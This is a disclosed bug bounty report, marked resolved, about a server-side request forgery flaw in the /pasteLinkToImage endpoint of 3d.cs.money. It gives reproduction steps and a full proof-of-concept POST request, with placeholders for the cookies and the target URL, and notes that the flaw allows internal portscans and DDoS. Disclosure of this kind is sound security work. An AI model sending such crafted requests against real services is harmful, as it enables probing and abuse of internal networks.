SSRF via 3d.cs.money/pasteLinkToImage
Medium
C
CS Money
Submitted None
Actions:
Reported by
putsi
Vulnerability Details
Technical details and impact analysis
## Summary:
SSRF via 3d.cs.money/pasteLinkToImage
The functionality fails to validate URL in link-parameter allowing attacker to create server-side request forgery attacks.
As the server does a full HTTP-request, this can for example be used to:
- DDoS-attacks towards internal and external hosts.
- Portscan internal hosts.
## Steps To Reproduce:
1. Place proper cookies to the attached request.
1. Place targeted URL in the link-parameter.
1. Send the request and notice that the server sent a HTTP-request to the targeted host.
## Supporting Material/References:
PoC-request:
```
POST /pasteLinkToImage HTTP/1.1
Host: 3d.cs.money
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: application/json, text/plain, */*
Accept-Language: fi-FI,fi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 82
Origin: https://3d.cs.money
Connection: close
Referer: https://3d.cs.money/
Cookie: INSERT_PRIME_COOKIES_HERE
{"link":"http:/INSERT_TARGET_URL_HERE"}
```
## Impact
- DDoS-attacks towards internal and external hosts.
- Portscan internal hosts.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Server-Side Request Forgery (SSRF)